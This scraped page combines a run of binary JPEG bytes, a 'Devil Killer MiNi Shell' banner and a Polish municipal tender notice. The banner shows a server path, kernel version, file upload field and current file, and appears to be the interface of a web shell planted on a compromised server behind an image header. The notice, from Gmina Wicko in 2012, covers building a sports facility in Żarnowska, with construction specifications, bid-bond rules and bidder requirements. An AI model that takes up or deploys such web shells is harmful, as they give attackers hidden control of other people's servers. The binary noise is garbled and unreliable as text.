JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121010/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121010/391492-N-2012.html

<p class="kh_header"><b>Wicko: Budowa budynku zaplecza sportowego w m. Żarnowska   - Gmina Wicko realizowana w ramach projektu pn. Budowa zaplecza sportowego z izbą pamięci, jako obiektu upamiętniającego znaczenie i dorobek braci rybackiej żyjącej w miejscowości Żarnowska  realizowanego ze środków Unii Europejskiej  w ramach  Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013</b><br>
<b>Numer ogłoszenia: 391492 - 2012; data zamieszczenia: 10.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wicko , Wicko 60, 84-352 Wicko, woj. pomorskie, tel. 059 8611182, faks 059 8611101.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wicko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku zaplecza sportowego w m. Żarnowska   - Gmina Wicko realizowana w ramach projektu pn. Budowa zaplecza sportowego z izbą pamięci, jako obiektu upamiętniającego znaczenie i dorobek braci rybackiej żyjącej w miejscowości Żarnowska  realizowanego ze środków Unii Europejskiej  w ramach  Programu Operacyjnego Zrównoważony rozwój sektora rybołówstwa i nadbrzeżnych obszarów rybackich 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje budowę budynku zaplecza sportowego wraz z zapleczem socjalnym o zabudowie  nawiązującej do architektury regionalnej na działce ewidencyjnej Nr 178  w m. Żarnowska. 
1. Ogólne ustalenia projektowe
 Budynek zaprojektowano jako parterowy, niepodpiwniczony z poddaszem użytkowym. W części parterowej zaprojektowano salę ogólną przeznaczoną dla spotkań podsumowujących  rozgrywki sportowe oraz zaplecze socjalne dla obsługi sali.
Na poddaszu budynku usytuowano pokoje gościnne dla przyjezdnych drużyn sportowych z możliwością skorzystania z pokoi przez personel obsługujący kompleks sportowy. 
Budynek przeznaczony jest do korzystania w okresie całorocznym, jednak jego główne wykorzystanie będzie                     w okresie letnim, podczas organizowanych letnich turniejów sportowych.
Z pomieszczeń na poddaszu korzystać będzie mogło maksymalnie 20 osób. Pomieszczenia parteru przeznaczone są do korzystania przez maksymalnie 50 osób.
Na budynku zaprojektowano dach symetryczny, wielospadowy o kącie nachylenia 45o (100%). Pokrycie dachu zaprojektowano z dachówki cementowej zakładkowej barwionej w kolorze czerwonym.
Projektowana wysokość budynku 8,08m < 9,50m. Szerokość elewacji frontowej-21,54m. 
W części parterowej budynku zaprojektowano wejście od frontu oraz od strony szczytowej budynku (elewacja południowo-zachodnia). Wejście na poddasze odbywać się będzie poprzez zewnętrzne schody żelbetowe usytuowane w tylnej części budynku (elewacja północno- zachodnia).
Parter budynku przystosowano dla osób niepełnosprawnych.
Poziom posadowienia posadzki parteru zaprojektowano na rzędnej  +2,30 m npm. W poziomie posadowienia fundamentów wg dokumentacji geotechnicznej wykonanej przez ZUG GEODOM występują piaski drobne średniozagęszczone o ID=0,468. Poziom wody gruntowej 0,20m ppt. Woda gruntowa nie jest agresywna                             w stosunku do betonu.
Dojazd do działki od strony północnej z drogi gminnej, gruntowej usytuowanej na działce nr 349 (ulica Polna).
Dojazd wykonać jako ciąg pieszo-jezdny wykonany z kostki betonowej na podsypce piaskowej. Na działce zaprojektowano miejsca postojowe w części zachodniej działki. 
Wody opadowe pozostaną na terenie działki.
Do projektowanego budynku należy wykonać przyłącza: kanalizacyjne o160,  przyłącze wodne o32 oraz przyłącze energetyczne. Przyłącza wykonać wg warunków technicznych wykonania .  Dostawa i odbiór mediów odbywać się będzie na warunkach ustalonych przez dostawców. Teren działki nr 178 oraz obiekty na nim zlokalizowane nie jest objęty żadną formą ochrony Wojewódzkiego Konserwatora Zabytków. 
Powierzchnia działki 178 obr. Żarnowska - 11 150m2. 
Powierzchnia zabudowy budynku zapl. sportowego   -166,04m2,  co stanowi 1,49% powierzchni działki i  jest mniejsze od wartości dopuszczalnej równej 20% powierzchni działki.
Powierzchnia schodów i podjazdów zewnętrznych  -29,16m2
Powierzchnia miejsc parkingowych   -398,0m2
Powierzchnia ciągów pieszo-jezdnych   -531,0m2
Powierzchnia zieleni niskiej na działce - 10 025,8m2.

2. Ogólne dane liczbowe budynku

Powierzchnia zabudowy budynku   -166,04m2                                                                                                        Powierzchnia użytkowa budynku   - 244,09 m2
Powierzchnia całkowita          - 311,85 m2
Kubatura budynku                - 995,18 m3

3. Elementy konstrukcyjne : 

3.1. Fundamenty
Fundamenty wykonać w postaci ław fundamentowych żelbetowych wykonanych wg rysunku nr 8 projektu. Zbrojenie podłużne ław wykonać ze stali żebrowanej o12 34GS a zbrojenie poprzeczne ze stali gładkiej St0S -o6 co 25cm. Ławy żelbetowe wykonać o wysokości 40cm z betonu B15. Pod ławy wykonać podlewkę                          z chudego betonu o grubości 10cm.
3.2. Ściany
Ściany fundamentowe murować z bloczków betonowych na zaprawie cementowej. Grubość ścian fundamentowych murowanych-25cm. 
Ściany parteru i poddasza wykonać jako murowane z bloczków gazobetonowych gr.24cm na zaprawie cementowo-wapiennej.
W ścianach poddasza wykonać słupki  żelbetowe s2 o zbrojeniu wg rys. nr 10 projektu. 
Ściany działowe parteru i poddasza wykonać jako murowane z gazobetonu o gr.12. 
Komin spalinowo-wentylacyjny wykonać jako prefabrykowany, systemowy z bloków żużlobetonowych                    z izolacją przewodu spalinowego.
Kominy wentylacyjne murować z kształtek ceramicznych 19x19cm na zaprawie cementowej.
Zaprojektowano wentylację grawitacyjną z wymuszeniem ciągu, poprzez wentylatory kanałowe uruchamiane włącznikiem światła w łazienkach i pomieszczeniach wc.
3.3.Nadproża i podciągi
Wszystkie nadproża wykonać jako prefabrykowane z belek L-19 o długościach belek wg rys. nr 9 projektu, zalewane zaprawą cementową.
3.4. Strop i schody 
Zaprojektowano strop żelbetowy zbrojony i wylewany na budowie. Płytę żelbetową wykonać z betonu B20 o grubości 12 i 14cm. Strop zazbroić stalą 34GS ( o12 i o8mm). Strop wykonać wg rysunku nr 9 i 11 projektu. Strop na ścianach oprzeć poprzez wieńce żelbetowe o wymiarach 24x25cm zbrojone 4o12 (34GS) i poprzecznie stalą o6 (St0S) co 25cm.
W stropie wykonać wzmocnienia A-A wg rys.9 projektu.
Zewnętrzne schody na poddasze wykonać jako żelbetowe, płytowe wylewane na budowie z betonu B20. Schody podeprzeć 2 słupami żelbetowymi 25x25cm. Grubość płyty biegowej, schodowej -14cm. Zbrojenie schodów wykonać wg rysunku nr 12.
3.5. Dach
Zaprojektowano dach wielospadowy, symetryczny o konstrukcji krokwiowo-jętkowej. Nachylenie połaci dachowej - 100% (45o).
Pokrycie dachu - dachówka cementowa w kolorze czerwonym. Wymiary i rozstawy elementów więźby dachowej podano na rysunku 14 projektu. Zestawienie drewnianych elementów więźby dachowej zamieszczono na rys. nr 13  projektu.
Elementy drewniane zabezpieczyć ogniochronnie oraz przeciw pleśniom i grzybom.
Rynny, rury spustowe oraz obróbki blacharskie wykonać jako systemowe z blachy powlekanej w kolorze czerwonym. Na okapach dachowych wykonać podbitkę z desek profilowanych i struganych jednostronnie.
3.6. Stolarka 
Stolarka okienna - indywidualna , PCV  w kolorze białym.
Stolarka drzwiowa - zewnętrzna -drzwi wejściowe jednoskrzydłowe z profili aluminowych, natomiast drzwi dwuskrzydłowe- z pcv. 
Stolarka drzwiowa wewnętrzna -płytowo-płycinowa, typowa prefabrykowana.
3.7. Tynki i wyprawy
Na ścianach murowanych i stropach żelbetowych wykonać wewnętrzne tynki cementowo-wapienne kl.III wykończone gładzią gipsową. Na poddaszu skosy i sufity wykończyć płytą gipsowo-kartonową gr.12,5mm, na stelażu systemowym-metalowym. W pomieszczeniu socjalnym ułożyć glazurę do wysokości 1,5m, natomiast w wc oraz łazienkach ułożyć glazurę na kleju do wysokości 2,0m.
3.8. Posadzki
Posadzki na parterze wykonać z terakoty na kleju. Na poddaszu terakotę ułożyć na korytarzu i w łazienkach. W pokojach na poddaszu posadzki wykończyć panelami podłogowymi na podkładzie z pianki izolacyjnej. Układ warstw posadzek pokazanych na przekrojach- rys. nr 3 i 4 projektu.
3.9.Izolacje 
Na ławach i ścianach fundamentowych wykonać izolację z warstwy papy termozgrzewalnej na lepiku. Izolacja pionowa ścian fundamentowych -2x abizol R+G z obu stron + wyprawa klejowa+folia wytłaczana, kubełkowa od strony zewnętrznej. Pozostałe izolacje wykonać wg warstw przekrojowych pokazanych na rys.3 i 4 projektu .
3.10. Elewacja 
Ściany zewnętrzne ocieplić styropianem gr.10cm, na którym wykonać cienkowarstwowy tynk akrylowy wg technologii systemowej. Do wysokości 30cm od poziomu gruntu wykonać tynk cokołowy.
3.11.Instalacje
Budynek należy podłączyć poprzez przyłącza do sieci wodnej, kanalizacyjnej i elektrycznej. 
Instalacja elektryczna
Do budynku należy wykonać przyłącze energetyczne. W wejściu do budynku zamontować tablicę T1.                      W tablicy umieścić przeciwpożarowy wyłącznik główny prądu. Z tablicy głównej zasilane będą obwody parteru i poddasza. Tablice T1 wykonać w skrzynce podtynkowej WXL 3x24. Jako system od porażeń prądem elektrycznym przewidziano szybkie wyłączanie zasilania przy wykorzystaniu wyłączników samoczynnych nadmiaroprądowych oraz wyłączników przeciwporażeniowych, różnicoprądowych o prądzie wyłączalnym 30mA. Żyłę PE należy połączyć z bolcami gniazd wtykowych 230V i obudową aparatów elektrycznych. Żyłę PE łączyć ze śrubą N przed wyłącznikiem R-P. Uziom wyrównawczy LY 10 łączyć z rurami: wodociągową i c.o. od tablicy T1.
Instalację elektryczną oświetlenia ogólnego i gniazd wtykowych wykonać wg rysunku nr 17 projektu. 
Do instalacji zastosować przewody YDY i YDYp-2,5mm2. Na skosach i sufitach drewnianych przewody prowadzić w rurkach karbowanych giętkich RKLG O16mm. 
Zaprojektowano wszędzie gniazdka podwójne z bolcem, montowane na wysokości 110cm od podłogi.                   W pomieszczeniu socjalnym, łazienkach i pomieszczeniu gospodarczym stosować osprzęt hermetyczny p.t. Oprawy oświetleniowe w łazience instalować na wysokości min. 225cm od podłoża.
Po wykonaniu instalacji wykonać pomiary skuteczności zerowania i izolacyjności przewodów oraz wymusić za wyłącznikiem różnicowo-prądowym prąd zadziałania. 
Instalowane przewody, kable i aparatura winny posiadać certyfikat dopuszczający do obrotu na rynku krajowym.
Instalacja wodociągowa
Budynek zaopatrywany będzie z wiejskiej sieci wodociągowej przyłączem wprowadzonym do pomieszczenia kotłowni.  Projektuje się wykonanie instalacji wodociągowej wody zimnej i ciepłej z rur miedzianych. Rury wodociągowe układane w posadzce należy montować w izolacji termicznej w postaci pianki poliuretanowej o grubości izolacji 9 mm. Przed zabetonowaniem rur należy przeprowadzić próbę szczelności na ciśnienie 1,5 razy większe od ciśnienia roboczego. W miejscach przejść przez ściany zastosować otuliny ze specjalnego PE. Wszystkie przewody rozprowadzające (woda zimna i c.w.u.) prowadzone w ścianach i bruzdach, należy izolować kształtkami z pianki poliuretanowej.
Instalacja kanalizacyjna
Projektuje się odprowadzenie ścieków sanitarnych z budynku instalacji kanalizacyjnej znajdującej się na ulicy Polnej. Przyłącze kanalizacyjne wykonać z rur i kształtek PVC kanalizacyjnych o160. Przewody poziome, łączące się z kanałem głównym ułożone będą pod posadzką na głębokości zabezpieczającej je przed przemarzaniem i uszkodzeniami mechanicznymi. Piony i podejścia do przyborów sanitarnych należy wykonać z rur i kształtek PVC kielichowych.  Sposób podłączenia oraz usytuowanie przyborów pokazano na rys. nr 15 projektu. Piony kanalizacyjne należy wyposażyć w odpowietrzenie w postaci zaworów odpowietrzających.
Instalacja centralnego ogrzewania

Projektuje się instalację centralnego ogrzewania pompową z rozdziałem dolnym. Instalacja systemu otwartego z kotłownią zlokalizowaną na parterze, w pomieszczeniu kotłowni. Czynnikiem grzewczym będzie woda o parametrach 80o/60oC. Instalacja centralnego ogrzewania w obiekcie zasilana będzie z kotła wodnego na opał -ekogroszek z atestem ekologicznym o mocy 25kW.
Ciepła woda użytkowa przygotowana będzie w pojemnościowym podgrzewaczu wody o pojemności 200dm3. Podgrzewacz należy wyposażyć dodatkowo w grzałkę elektryczną w celu przygotowania c.w.u. w okresie letnim.
Przed pojemnościowym podgrzewaczem wody na przewodzie zimnej wody zamontować membranowy zawór bezpieczeństwa.
Zmianę objętości czynnika grzejnego przejmie naczynie wzbiorcze systemu otwartego typ A:
- pojemność użytkowa -11,0dm3
- pojemność całkowita -15,0dm3
- wymiary: Dw=265mm, A=278mm
Dla zapewnienia dostawy ciepła na cele centralnego ogrzewania zastosować pompę obiegową zamontowaną na przewodzie zasilającym.
Na instalacji centralnego ogrzewania przed kotłem należy zamontować zawór trójdrogowy DN25 z napędem. Pracą kotła steruje mikroprocesorowy regulator z regulacją pogodową. Powietrze do spalania do pomieszczenia kotłowni doprowadzane jest z zewnątrz otworem wentylacyjnym 14/14cm umieszczonym w dolnej części pomieszczenia.
Przewody
Prowadzenie rur w budynku zaprojektowano w systemie dwunitkowym rozprowadzeń przewodów w warstwie wylewki posadzkowej. Czynnik grzewczy rozprowadzany będzie do poszczególnych grzejników przewodami z rur z polibutylenu Dn15mm, układanych w rurach osłonowych karbowanych Peschla.
Po wykonaniu instalacji należy ją poddać próbie ciśnieniowej. Po montażu należy zabetonować rury. Instalację w obrębie kotłowni wykonać z rur miedzianych.
Grzejniki
Projektuje się zamontowanie grzejników stalowych płytowych z wbudowaną wkładką zaworu termostatycznego. Przed grzejnikami zaprojektowano zestawy przyłączeniowe do grzejników z wbudowanym zaworem odcinającym. Jako armaturę odcinającą przy kotle c.o. należy zastosować zawory kulowe.
4. W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji lub innej części SIWZ, zostały wskazane znaki towarowe, patenty lub pochodzenie materiałów, urządzeń, bądź przedmiot zamówienia został opisany za pomocą norm, aprobat, specyfikacji technicznych   i systemów odniesienia, Zamawiający dopuszcza oferowanie materiałów i urządzeń równoważnych opisywanym, z zastrzeżeniem, że gwarantują one realizację zamówienia zgodnie z opisem przedmiotu zamówienia i zapewniają uzyskanie parametrów technicznych i funkcjonalno-użytkowych nie gorszych od założonych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.21.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 10.000,00 zł (słownie złotych: dziesięć  tysięcy ).
2. Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy, tj.:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr z 2007 Nr 42, poz. 275).
3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:
Bank Spółdzielczy w Łebie
Nr 19 9324 0008 0000 3971 2000 0050
5. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania ( data i godzina ) kwoty na rachunku Zamawiającego .
6. Wadium wnoszone w formie innej niż pieniądz należy złożyć w formie oryginału w siedzibie Zamawiającego ( Urząd Gminy Wicku, Wicko 60, 84-352 Wicko) w sekretariacie - pokój Nr 8 na parterze. Nie należy załączać oryginału dokumentu wadialnego do oferty.
7. Dowód wniesienia wadium tj. kopię dokonania przelewu na konto Zamawiającego albo kopię  dokumentów poświadczających wniesienie wadium w  formie innej niż pieniądz,  należy dołączyć do oferty.
8. Gwarancja musi być podpisana przez upoważnionego ( upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny ( z podaniem imienia i nazwiska) . Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium                 w okolicznościach określonych w art. 46 ust. 4a oraz art. 46 ust. 5 ustawy Prawo zamówień publicznych.
9. W przypadku wniesienia wadium w formie innej niż pieniężna, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania z ofertą.
10. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.
11. Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie , o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że wykonawca udowodni, że wynika to z przyczyn nie leżących po jego stronie. Zamawiający zatrzyma wadium wraz                                       z odsetkami, jeżeli wykonawca, którego oferta została wybrana :
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych                   w ofercie ;
2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten będzie spełniony, jeżeli Wykonawca wykonał   w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną  robotę budowlaną polegającą na kompleksowej  budowie murowanego obiektu kubaturowego o kubaturze wynoszącej nie mniej niż 900m3, wraz z pracami wykończeniowymi  oraz pracami instalacyjnymi .
Oceny spełnienia w/w warunku Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w pkt. 6 SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej                     z przedmiotem zamówienia  na sumę gwarancyjną nie mniejszą niż 700.000,00 zł ( słownie złotych : siedemset tysięcy )
Oceny spełnienia w/w warunku Zamawiający dokona sprawdzając kompletność oferty oraz poprawność i treść złożonych dokumentów wymienionych w pkt. 6 SIWZ metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
